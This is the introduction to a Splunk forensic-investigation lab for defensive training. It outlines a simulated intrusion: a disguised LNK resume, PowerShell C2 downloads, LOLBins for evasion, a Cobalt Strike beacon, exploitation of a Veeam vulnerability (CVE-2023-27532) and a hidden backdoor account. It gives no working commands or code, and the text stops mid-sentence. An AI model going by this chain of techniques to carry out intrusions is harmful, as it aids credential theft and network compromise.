In this lab, we will conduct a forensic investigation of a targeted cyber attack that involved initial access via a malicious document, followed by persistence mechanisms, privilege escalation, and lateral movement. Using Splunk, we will analyze event logs, track malicious executions, and identify compromised systems and credentials used by the attacker. The investigation begins with the delivery of a malicious ZIP file named "Albert_Resume.zip", which contained a shortcut file (.lnk) masquerading as a resume. This shortcut file triggered a chain of events, leading to the execution of PowerShell commands that downloaded additional payloads from an external command and control (C2) server. The attacker then leveraged (LOLBas) such as ie4uinit.exe and msxsl.exe to execute further malicious scripts while evading detection. As we analyze the attack timeline, we will uncover how the attacker deployed a Cobalt Strike beacon, executed a privilege escalation exploit, and attempted to exfiltrate sensitive credentials. The attack also included the exploitation of a known vulnerability (CVE-2023-27532) in Veeam Backup & Replication software, allowing the adversary to extract stored credentials and further compromise the network.
Additionally, the investigation will highlight an unsuccessful RDP login attempt using stolen credentials and the attacker's creation of a hidden backdoor account ("admi1_2") to maintain persistence. These techniques, commonly seen in advanced persistent threat (APT) operations, demonstrate the complexity and stealth employed by adversaries in modern cyber intrusions.
By the end of this lab, you will gain hands-on experience in track